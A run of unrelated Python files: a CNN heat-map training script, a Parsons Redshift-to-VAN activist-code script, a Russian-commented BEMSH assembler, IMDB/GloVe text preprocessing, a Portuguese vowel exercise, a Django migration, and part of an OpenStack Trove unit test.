cv2.resize(im2double(curCAMmapLarge_crops), (299, 299)) # this line is not doing much curHeatMap = im2double(curHeatMap) curHeatMap = py_map2jpg(curHeatMap, None, 'jet') xim = x[ij].reshape(-1, 3) xim1 = xim[:, 0].reshape(-1, 299) xim2 = xim[:, 1].reshape(-1, 299) xim3 = xim[:, 2].reshape(-1, 299) image = np.empty([299,299,3]) image[:, :, 0] = xim1 image[:, :, 1] = xim2 image[:, :, 2] = xim3 a = im2double(image) * 255 b = im2double(curHeatMap) * 255 curHeatMap = a * 0.6 + b * 0.4 ab = np.hstack((a,b)) full = np.hstack((curHeatMap, ab)) # imname = DIR + '/' + ddt + str(ij) + '.png' # imname1 = DIR + '/' + ddt + str(ij) + '_img.png' # imname2 = DIR + '/' + ddt + str(ij) + '_hm.png' imname3 = DIR + '/' + ddt + str(ij) + '_full.png' # cv2.imwrite(imname, curHeatMap) # cv2.imwrite(imname1, a) # cv2.imwrite(imname2, b) cv2.imwrite(imname3, full) def main(tenum, trnum, trc, tec, reITER=None, old_ITER=None, to_reload=None, test=None, log_dir=None): if test: # restore if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) print("Loaded! Ready for test!", flush=True) for a in range(tenum): aa = str(a+1) tdat_f = data_dir + '/data_test_{}.txt'.format(aa) tlab_f = data_dir + '/lab_test_{}.txt'.format(aa) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b+1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec-5000 elif tec in range(1024, 5001): mppp = int(tec/1024) for b in range(mppp): bb = str(b+1+a*5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") elif to_reload: if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, meta_graph=to_reload, log_dir=LOG_DIR) print("Loaded! Restart training.", flush=True) for a in range(trnum): aa = str(a + 1) dat_f = data_dir + '/data_{}.txt'.format(aa) lab_f = data_dir + '/lab_{}.txt'.format(aa) HE, sz = load_HE_data(train_dat_name=dat_f, train_lab_name=lab_f, valid_dat_name=dat_f, valid_lab_name=lab_f) old_ITER = m.get_global_step(HE)[0] if sz < 4998: reITER = int(sz * reITER/5000) MAX_ITER = old_ITER + reITER else: MAX_ITER = old_ITER + reITER if a == trnum-1: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=True, outdir=METAGRAPH_DIR) else: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=False, outdir=METAGRAPH_DIR) if trc > 1026: x, y = HE.validation.next_batch(1024) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) elif trc in range(50, 1026): x, y = HE.validation.next_batch(trc) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) else: print("The last training set is too small! No metrics generated.") trc -= 5000 for at in range(tenum): aat = str(at+1) tdat_f = data_dir + '/data_test_{}.txt'.format(aat) tlab_f = data_dir + '/lab_test_{}.txt'.format(aat) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b+1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec-5000 elif tec in range(1024, 5001): mppp = int(tec/1024) for b in range(mppp): bb = str(b+1+at*5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") else: # train if md == 'IG': m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I2': m = cnnt.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I3': m = cnnm.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'I4': m = cnni.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'IR1': m = cnnir1.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'IR2': m = cnnir2.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'VA': m = cnnva.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'V16': m = cnnv16.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) elif md == 'V19': m = cnnv19.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) else: m = cnng.INCEPTION(INPUT_DIM, HYPERPARAMS, log_dir=LOG_DIR) print("Start training!") for a in range(trnum): aa = str(a + 1) dat_f = data_dir + '/data_{}.txt'.format(aa) lab_f = data_dir + '/lab_{}.txt'.format(aa) HE, sz = load_HE_data(train_dat_name=dat_f, train_lab_name=lab_f, valid_dat_name=dat_f, valid_lab_name=lab_f) if sz < 4998: modITER = int(sz * reITER / 5000) MAX_ITER = old_ITER + reITER * a + modITER else: MAX_ITER = old_ITER + reITER * (a + 1) if a == trnum-1: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=True, outdir=METAGRAPH_DIR) else: m.train(HE, max_iter=MAX_ITER, max_epochs=MAX_EPOCHS, verbose=True, save=False, outdir=METAGRAPH_DIR) if trc > 1026: x, y = HE.validation.next_batch(1024) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) elif trc in range(50, 1026): x, y = HE.validation.next_batch(trc) print('Generating metrics') tr, trnet, trw = m.inference(x) CAM(trnet, trw, tr, x, y, dirr, 'Train_{}'.format(aa)) metrics(tr, y, dirr, 'Train_{}'.format(aa)) else: print("The last training set is too small! No metrics generated.") trc -= 5000 for at in range(tenum): aat = str(at + 1) tdat_f = data_dir + '/data_test_{}.txt'.format(aat) tlab_f = data_dir + '/lab_test_{}.txt'.format(aat) HET, _ = load_HE_data(train_dat_name=tdat_f, train_lab_name=tlab_f, valid_dat_name=tdat_f, valid_lab_name=tlab_f) ppp = int(5000 / 1024) if tec > 5000: for b in range(ppp): bb = str(b + 1) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) tec = tec - 5000 elif tec in range(1024, 5001): mppp = int(tec / 1024) for b in range(mppp): bb = str(b + 1 + at * 5) x, y = HET.validation.next_batch(1024) print('Test:') te, tenet, tew = m.inference(x) CAM(tenet, tew, te, x, y, dirr, 'Test_{}'.format(bb)) metrics(te, y, dirr, 'Test_{}'.format(bb)) else: print("Not enough for a test batch!") if __name__ == "__main__": tf.reset_default_graph() for DIR in (LOG_DIR, METAGRAPH_DIR, data_dir, out_dir): try: os.mkdir(DIR) except(FileExistsError): pass if not os.path.isfile(img_dir+'/te_sample.csv'): _, _, _, tes, trs = Sample_prep.samplesum() tes.to_csv(img_dir+'/te_sample.csv', index=False) trs.to_csv(img_dir+'/tr_sample.csv', index=False) trc, tec, trnum, tenum = counters(img_dir) try: modeltoload = sys.argv[5] try: testmode = sys.argv[6] main(tenum, trnum, trc, tec, to_reload=modeltoload, log_dir=LOG_DIR, test=True) except(IndexError): main(tenum, trnum, trc, tec, reITER=iter, to_reload=modeltoload, log_dir=LOG_DIR) except(IndexError): if not os.path.isfile(data_dir + '/lab_test_{}.txt'.format(str(tenum))): loader(img_dir) main(tenum, trnum, trc, tec, reITER=iter, old_ITER=0) 1-10 # ### METADATA # Connectors: Redshift, VAN # Description: Gets activist codes stored in redshift and applies to users in Van # Parsons Version: unknown # ### CONFIGURATION # Set the configuration variables below or set environmental variables of the # same name and leave these # with empty strings. We recommend using environmental variables if possible. config_vars = { # Redshift "REDSHIFT_PORT": "", "REDSHIFT_DB": "", "REDSHIFT_HOST": "", "REDSHIFT_CREDENTIAL_USERNAME": "", "REDSHIFT_CREDENTIAL_PASSWORD": "", # Van "VAN_PASSWORD": "", "VAN_DB_NAME": "" } # ### CODE from parsons import Table, Redshift, VAN # noqa E402 from parsons import logger # noqa E402 import os # noqa E402 # Setup for name, value in config_vars.items(): # sets variables if provided in this script if value.strip() != "": os.environ[name] = value rs = Redshift() # just create Redshift() - VAN connector is created dynamically below # Create dictionary of VAN states and API keys from multiline Civis credential myv_states = {x.split(",")[0]: x.split(",")[1] for x in os.environ['VAN_PASSWORD'].split("\r\n")} myv_keys = {k: VAN(api_key=v, db=os.environ['VAN_DB_NAME']) for k, v in myv_states.items()} # Create simple set of states for insertion into SQL states = "','".join([s for s in myv_keys]) # SQL to pull those needing Activist Code sql = f""" SELECT vb_smartvan_id , vb_vf_source_state , hash , activist_code_id FROM schema.table WHERE vb_vf_source_state IN ({states}) """ records = rs.query(sql) logger.info(f"Applying Activist Codes to {str(records.num_rows)} records...") # Apply codes segmented by state (different API Keys) for state, key in myv_keys.items(): state_set = records.select_rows(lambda row: row.vb_vf_source_state == state) if len(state_set) > 0: logger.info(f"Applying {str(len(state_set))} Activist Codes in {state}...") for vanid in state_set: # TODO: row undefined, select row form record? row = None key.toggle_activist_code(row['vb_smartvan_id'], row['activist_code_id'], 'apply') # -*- coding: utf-8 -*- """ BEMSH-subset assembler """ import re from pprint import pprint from ply import lex, yacc """ В трансляторе БЕМШ зарезервированы следующие управляюще команды: """ TRAN_KEYWORDS = ("код", "старт", "финиш", "адрес", "литер", "стрн", "строк", "экв", "пам", "конд", "текст", "конк", "употр", "отмен", "входн", "внеш") """ Список коротких программ в порядке возрастания кода операции """ OP_SHORT = ("зп", "зпм", "рег", "счм", "сл", "вч", "вчоб", "вчаб", "сч", "и", "нтж", "слц", "знак", "или", "дел", "умн", "сбр", "рзб", "чед", "нед", "слп", "вчп", "сд", "рж", "счрж", "счмр", "э32", "увв", "слпа", "вчпа", "сда", "ржа", "уи", "уим", "счи", "счим", "уии", "сли", "э46", "э47", "э50", "э51", "э52", "э53", "э54", "э55", "э56", "э57", "э60", "э61", "э62", "э63", "э64", "э65", "э66", "э67", "э70", "э71", "э72", "э73", "э74", "э75", "э76", "э77") """ Список длинных команд в порядке возростания кода операции """ OP_LONG = ("э20", "э21", "мода", "мод", "уиа", "слиа", "по", "пе", "пб", "пв", "выпр", "стоп", "пио", "пино", "э36", "цикл") """ Ключевые слова компилятора """ KEYWORDS = OP_SHORT + OP_LONG """ Словарь соответсвия мнемонике коду операции """ OPCODE_NUM = {KEYWORDS[i]: i for i in range(0, len(KEYWORDS))} """ Распознаваемые токены для лекс. анализатора """ tokens = ( 'ID', 'NUMBER', 'NEWLINE', 'OPCODE', 'TRAN' ) """ Литералы """ literals = ['(', ')', '+', '-', '*', '/'] """ Комментарии пропускаем """ t_ignore_COMMENT = r'[\*;].*' def t_NUMBER(t): r'(м\d+)?((\'?-?\d+\'?)|([вbк]\'\d+\')|(п\'.*\'))' if t.value[0] == '\'': t.value = int(t.value[1:-1], 8) elif t.value[0] in 'кk': t.value = int(t.value[2:-1], 2) elif t.value[0] in 'вbк': t.value = int(t.value[2:-1], 8) elif t.value[0] == 'п': t.value = t.value[2:-1] elif t.value[0] == 'м': # TODO: константа со здвигом влево p = r"м(?P\d+)[вb]'(?P\d+)'" res = re.findall(p, t.value) t.value = int(res[0][1], 8) << int(res[0][0]) else: t.value = int(t.value) return t t_ignore = " \r\t" def t_NEWLINE(t): r'\n' t.lexer.lineno += 1 return t def t_ID(t): r'[a-zA-Zа-яА-Я]+[a-zA-Zа-яА-Я0-9]*' if t.value in TRAN_KEYWORDS: t.type = 'TRAN' elif t.value in KEYWORDS: t.type = 'OPCODE' return t def t_error(t): print("Illegal character '%s' at line %d" % (t.value[0], t.lexer.lineno)) lexer = lex.lex(reflags=re.UNICODE) precedence = ( ('left', '+', '-'), # ('left', '*', '/'), # ('right', 'UMINUS'), ) def p_prog_list(p): '''prog : prog statement | statement''' if len(p) == 2: if p[1] is None: p[1] = [('EMPTY', 0, 0)] p[0] = [p[1]] elif len(p) == 3: #print(p[0], p[1], p[2]) if p[2] is not None: p[1].append(p[2]) p[0] = p[1] def p_tran_directive(p): '''tran_dir : TRAN NUMBER | TRAN''' if len(p) == 2: p[0] = ('TRAN', p[1]) else: p[0] = ('TRAN', p[1], p[2]) def p_expr(p): """ expr : NUMBER | ID | expr '+' expr | expr '-' expr""" if len(p) == 2: # print(p[1], p.lexer.lexdata, repr(p)) if not isinstance(p[1], int): p[0] = ('LABEL', p[1]) else: p[0] = p[1] elif len(p) == 4: if isinstance(p[1], int) and isinstance(p[3], int): if p[2] == '+': p[0] = p[1] + p[3] else: p[0] = p[1] - p[3] else: p[0] = (p[2], p[1], p[3]) def p_addr(p): """addr : expr | expr '(' expr ')' | '(' expr ')'""" if len(p) == 2: p[0] = {"offset": p[1], "idx": 0} elif len(p) == 5: p[0] = {"offset": p[1], "idx": p[3]} elif len(p) == 4: p[0] = {"offset": 0, "idx": p[2]} def p_instruction(p): ''' instruction : OPCODE | OPCODE addr''' if len(p) == 3: p[0] = ('OPCODE', p[1], p[2]) else: p[0] = ('OPCODE', p[1], {"offset": 0, "idx": 0}) def p_label(p): '''statement : ID''' p[0] = ('LABEL', p[1]) def p_stat_nl(p): '''statement : NEWLINE''' def p_statement(p): '''statement : tran_dir NEWLINE | instruction NEWLINE''' p[0] = p[1] def p_error(p): if p: print("Syntax error at '%s'" % p.value, p.lineno) else: print("Syntax error at EOF") exit() def collect_labels(prog): """ Сбор меток """ labels = {} for i in prog: if i[0] == 'LABEL': labels[i[1]] = None return labels def calc_tree(labels, expr): """ Вычисление адресного выражения операнда команды """ if isinstance(expr, int): return expr if expr[0] == 'LABEL': result = labels[expr[1]] elif expr[0] == '+': result = calc_tree(labels, expr[1]) + calc_tree(labels, expr[2]) elif expr[0] == '-': result = calc_tree(labels, expr[1]) - calc_tree(labels, expr[2]) else: print("Unkonown oper in expr", expr) return result def pack_instructions(prog): """ Укладывание команд в память во внутреннее представление программы """ cur_addr = 0 # адрес в полусловах, т.е. одно слово занимает два полуслова # проход по дереву - определение списка меток labels = collect_labels(prog) memory = [] # проход по дереву - укладывание команд в память for i in prog: if i[0] == 'LABEL': # если метка и правая команда if cur_addr % 2 == 1: # то вставляема "мода 0" memory.append( (cur_addr, ('OPCODE', 'мода', { 'idx': 0, 'offset': 0}))) cur_addr += 1 labels[i[1]] = cur_addr // 2 # сопоставление адрес соотв. метке # в машинных словах continue elif i[0] == 'TRAN': if i[1] == 'старт' or i[1] == 'адрес': cur_addr = int(i[2]) * 2 # директива старт elif i[1] == 'конд': # длинная константа занимает одно слово if cur_addr % 2 == 1: # поэтому выравниваем если необходимо memory.append( (cur_addr, ('OPCODE', 'мода', { 'idx': 0, 'offset': 0}))) cur_addr += 1 memory.append((cur_addr, ('TRAN', 'конк', i[2] >> 24))) memory.append((cur_addr+1, ('TRAN', 'конк', i[2] & 0o77777777))) cur_addr += 2 elif i[1] == 'конк': # короткая константа занимает полуслово memory.append((cur_addr, i)) cur_addr += 1 elif i[1] == 'текст': # укладываем текст по 6 букв в машинные слова j = 0 text = i[2].encode('utf-8') while j < len(text): t = text[j:j + 6] j += 6 if len(t) < 6: t += b' ' * (6 - len(t)) memory.append((cur_addr, ('TRAN', 'конк', t[:3]))) memory.append((cur_addr + 1, ('TRAN', 'конк', t[3:]))) cur_addr += 2 else: print("Неизвестная директива", i[1]) exit() continue elif i[0] == 'OPCODE': memory.append((cur_addr, i)) cur_addr += 1 continue else: print("Warning: Unknown token:", i) if cur_addr % 2 == 1: memory.append((cur_addr, ('OPCODE', 'мода', {'idx': 0, 'offset': 0}))) print("Внутреннее представление:") for m in memory: print('Address: {:0>8o} Data: {:0>20}'.format(m[0] // 2, str(m[1]))) print("Адреса меток:") for m in labels.items(): print('Label: {:<8} Address: {:0>5o}'.format(m[0], m[1])) # после того как стали известны адреса меток, # вычислим адресные выражения команд for i in range(0, len(memory)): if memory[i][1][0] == 'OPCODE' and not isinstance( memory[i][1][2]['offset'], int): memory[i][1][2]['offset'] = calc_tree( labels, memory[i][1][2]['offset']) return memory def gen_instr(cmd): """ Получение машинного кода по мнемонике и адресному выражению """ global OPCODE_NUM op = 0 if cmd[0] == 'OPCODE': mc = ((cmd[2]['idx'] << 20) & 0o74000000) if cmd[1] in OP_SHORT: op = (OPCODE_NUM[cmd[1]] << 12) & 0o770000 op |= (cmd[2]['offset'] & 0o7777) else: op = (OPCODE_NUM[cmd[1]] << 15) & 0o3700000 | 0o2000000 op |= (cmd[2]['offset'] & 0o77777) op |= mc elif cmd[0] == 'TRAN' and cmd[1] == 'конк': if isinstance(cmd[2], int): op = cmd[2] else: op = (cmd[2][0] << 16) | (cmd[2][1] << 8) | cmd[2][2] return op def gen_mcode(mem): """ Укладывание двух команд или коротких констант в машинное слово """ mem_ret = [] i = 0 while i < len(mem)-1: mem_ret.append((mem[i][0]//2, (gen_instr(mem[i][1])<<24) | gen_instr(mem[i+1][1]))) i += 2 return mem_ret yacc.yacc() # ШАГ 1. Построение дерева разбора prog = yacc.parse(open('simple.bemsh', encoding='utf-8').read()) print("Дерево разбора: ") pprint(prog) # ШАГ 2. Укладывание инструкций/констант в память и определение адресов меток mem = pack_instructions(prog) print("Вычисленные метки прописаны:") pprint(mem) # ШАГ 3. Генерирование машинного кода с упаковкой в слова по 48-бит mem = gen_mcode(mem) print("Машинный код") for m in mem: print('Address: {:>6o} Data: {:0>16o}'.format(m[0], m[1]))import os import numpy as np from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from sklearn.utils import shuffle def load_data(): # neg = 0, pos = 1 X_train, Y_train, X_test, Y_test = [], [], [], [] # Prepare paths data_path = os.path.join(os.getcwd(), "data") train_neg_path = os.path.join(data_path, "train", "neg") train_pos_path = os.path.join(data_path, "train", "pos") test_neg_path = os.path.join(data_path, "test", "neg") test_pos_path = os.path.join(data_path, "test", "pos") # Load training data for filename in os.listdir(train_neg_path): with open(os.path.join(train_neg_path, filename), encoding="utf8") as f: review = f.readline() X_train.append(review) Y_train.append(0) for filename in os.listdir(train_pos_path): with open(os.path.join(train_pos_path, filename), encoding="utf8") as f: review = f.readline() X_train.append(review) Y_train.append(1) print("Training data loaded") # Load test data for filename in os.listdir(test_neg_path): with open(os.path.join(test_neg_path, filename), encoding="utf8") as f: review = f.readline() X_test.append(review) Y_test.append(0) for filename in os.listdir(test_pos_path): with open(os.path.join(test_pos_path, filename), encoding="utf8") as f: review = f.readline() X_test.append(review) Y_test.append(1) print("Test data loaded") return X_train, Y_train, X_test, Y_test def preprocess_data(X_train, Y_train, X_test, Y_test, input_len): # Load vocabulary vocab_path = os.path.join(os.getcwd(), "data", "imdb.vocab") with open(vocab_path, encoding="utf8") as f: vocab = f.read().splitlines() print("Vocabulary length before tokenizing: " + str(len(vocab))) # Prepare tokenizer, the out of vocabulary token for GloVe is "unk" tokenizer = Tokenizer(oov_token="unk") tokenizer.fit_on_texts(vocab) vocab_len = len(tokenizer.word_index) + 1 print("Vocabulary length after tokenizing: " + str(vocab_len)) # Convert text to sequences of indices X_train = tokenizer.texts_to_sequences(X_train) X_test = tokenizer.texts_to_sequences(X_test) # Pad sequences with zeros so they all have the same length X_train = pad_sequences(X_train, maxlen=input_len, padding="post") X_test = pad_sequences(X_test, maxlen=input_len, padding="post") # Convert training and test data to numpy arrays X_train = np.array(X_train, dtype="float32") Y_train = np.array(Y_train, dtype="float32") X_test = np.array(X_test, dtype="float32") Y_test = np.array(Y_test, dtype="float32") # Shuffle training and test data X_train, Y_train = shuffle(X_train, Y_train) X_test, Y_test = shuffle(X_test, Y_test) # Split test data into validation and test sets split_index = int(0.5 * X_test.shape[0]) X_val = X_test[split_index:] Y_val = Y_test[split_index:] X_test = X_test[:split_index] Y_test = Y_test[:split_index] return X_train, Y_train, X_val, Y_val, X_test, Y_test, tokenizer def create_embedding_matrix(tokenizer): # Load GloVe embedding vectors embedding_path = os.path.join(os.getcwd(), "data", "glove.6B", "glove.6B.100d.txt") word_to_embedding = {} with open(embedding_path, encoding="utf8") as f: for line in f.readlines(): values = line.split() word = values[0] embedding_vec = np.asarray(values[1:], dtype="float32") word_to_embedding[word] = embedding_vec print("Embedding vectors loaded") # Create embedding matrix embedding_vec_dim = 100 vocab_len = len(tokenizer.word_index) + 1 embedding_matrix = np.zeros((vocab_len, embedding_vec_dim)) for word, i in tokenizer.word_index.items(): embedding_vec = word_to_embedding.get(word) if embedding_vec is not None: embedding_matrix[i] = embedding_vec print("Embedding matrix created") return embedding_matrix vaniaferreira/Python #Crie um programa que tenha uma tupla com várias palavras(Não usar acentos). #Depois disto, você deve mostrar, para cada palavra, quais são suas vogais. palavras = ('Mamão','Pao','Queijo', 'Danone', 'Cafe', 'Leite') for p in palavras: print(f'\nNa palavra {p.upper()} temos: ',end='') for letra in p: if letra.lower() in ('aeiou'): print(letra, end=' ') Scud17/cattitude # Generated by Django 3.2 on 2021-05-03 03:58 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('units', '0002_unit_to_si_unit'), ('products', '0001_initial'), ] operations = [ migrations.AddField( model_name='product', name='unit', field=models.ForeignKey(default='1', on_delete=django.db.models.deletion.CASCADE, to='units.unit'), ), ] # Copyright 2012 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os from mock import DEFAULT from mock import MagicMock from mock import patch from proboscis.asserts import assert_equal from testtools.matchers import Is, Equals, Not from trove.common.db.mysql import models from trove.common.exception import InsufficientSpaceForReplica from trove.common.exception import ProcessExecutionError from trove.common import instance as rd_instance from trove.guestagent import backup from trove.guestagent.common import operating_system # TODO(atomic77) The test cases should be made configurable # to make it easier to test the various derived datastores. from trove.guestagent.datastore.mysql.manager import Manager import trove.guestagent.datastore.mysql.service as dbaas from trove.guestagent import dbaas as base_dbaas from trove.guestagent import pkg from trove.guestagent import volume from trove.guestagent.volume import VolumeDevice from trove.tests.unittests.guestagent.test_datastore_manager import \ DatastoreManagerTest from trove.tests.unittests import trove_testtools class GuestAgentManagerTest(DatastoreManagerTest): def setUp(self): super(GuestAgentManagerTest, self).setUp('mysql') self.context = trove_testtools.TroveTestContext(self) self.replication_strategy = 'MysqlGTIDReplication' self.patch_rs = patch( 'trove.guestagent.strategies.replication.get_strategy', return_value=self.replication_strategy) self.mock_rs = self.patch_rs.start() self.addCleanup(self.patch_rs.stop) self.manager = Manager() self.origin_MySqlAppStatus = dbaas.MySqlAppStatus.get self.origin_os_path_exists = os.path.exists self.origin_format = volume.VolumeDevice.format self.origin_migrate_data = volume.VolumeDevice.migrate_data self.origin_mount = volume.VolumeDevice.mount self.origin_unmount = volume.VolumeDevice.unmount self.origin_mount_points = volume.VolumeDevice.mount_points self.origin_stop_mysql = dbaas.MySqlApp.stop_db self.origin_start_mysql = dbaas.MySqlApp.start_mysql self.origin_update_overrides = dbaas.MySqlApp.update_overrides self.origin_install_if_needed = dbaas.MySqlApp.install_if_needed self.origin_secure = dbaas.MySqlApp.secure self.origin_secure_root = dbaas.MySqlApp.secure_root self.origin_pkg_is_installed = pkg.Package.pkg_is_installed self.origin_os_path_exists = os.path.exists self.origin_chown = operating_system.chown # set up common mock objects, etc. for replication testing self.patcher_gfvs = patch( 'trove.guestagent.dbaas.get_filesystem_volume_stats') self.patcher_rs = patch( 'trove.guestagent.strategies.replication.get_instance') self.mock_gfvs_class = self.patcher_gfvs.start() self.mock_rs_class = self.patcher_rs.start() def tearDown(self): super(GuestAgentManagerTest, self).tearDown() dbaas.MySqlAppStatus.get = self.origin_MySqlAppStatus os.path.exists = self.origin_os_path_exists volume.VolumeDevice.format = self.origin_format volume.VolumeDevice.migrate_data = self.origin_migrate_data volume.VolumeDevice.mount = self.origin_mount volume.VolumeDevice.unmount = self.origin_unmount volume.VolumeDevice.mount_points = self.origin_mount_points dbaas.MySqlApp.stop_db = self.origin_stop_mysql dbaas.MySqlApp.start_mysql = self.origin_start_mysql dbaas.MySqlApp.update_overrides = self.origin_update_overrides dbaas.MySqlApp.install_if_needed = self.origin_install_if_needed dbaas.MySqlApp.secure = self.origin_secure dbaas.MySqlApp.secure_root = self.origin_secure_root operating_system.chown = self.origin_chown pkg.Package.pkg_is_installed = self.origin_pkg_is_installed os.path.exists = self.origin_os_path_exists # teardown the replication mock objects self.patcher_gfvs.stop() self.patcher_rs.stop() def test_update_status(self): mock_status = MagicMock() mock_status.is_installed = True mock_status._is_restarting = False dbaas.MySqlAppStatus.get = MagicMock(return_value=mock_status) self.manager.update_status(self.context) self.assertTrue(mock_status.set_status.called) def _empty_user(self): return models.MySQLUser(deserializing=True) def test_valid_host_name(self): test_host = "172.16.31.10/255.255.255.0" user = self._empty_user() user.host = test_host self.assertEqual(test_host, user.host) @patch.object(dbaas.MySqlAdmin, 'create_database') def test_create_database(self, create_db_mock): self.manager.create_database(self.context, ['db1']) create_db_mock.assert_any_call(['db1']) @patch.object(dbaas.MySqlAdmin, 'create_user') def test_create_user(self, create_user_mock): self.manager.create_user(self.context, ['user1']) create_user_mock.assert_any_call(['user1']) @patch.object(dbaas.MySqlAdmin, 'delete_database') def test_delete_database(self, delete_database_mock): databases = ['db1'] self.manager.delete_database(self.context, databases) delete_database_mock.assert_any_call(databases) @patch.object(dbaas.MySqlAdmin, 'delete_user') def test_delete_user(self, delete_user_mock): user = ['user1'] self.manager.delete_user(self.context, user) delete_user_mock.assert_any_call(user) @patch.object(dbaas.MySqlAdmin, 'grant_access') def test_grant_access(self, grant_access_mock): username = "test_user" hostname = "test_host" databases = ["test_database"] self.manager.grant_access(self.context, username, hostname, databases) grant_access_mock.assert_any_call(username, hostname, databases) @patch.object(dbaas.MySqlAdmin, 'list_databases', return_value=['database1']) def test_list_databases(self, list_databases_mock): databases = self.manager.list_databases(self.context) self.assertThat(databases, Not(Is(None))) self.assertThat(databases, Equals(list_databases_mock.return_value)) list_databases_mock.assert_any_call(None, None, False) @patch.object(dbaas.MySqlAdmin, 'list_users', return_value=['user1']) def test_list_users(self, list_users_mock): users = 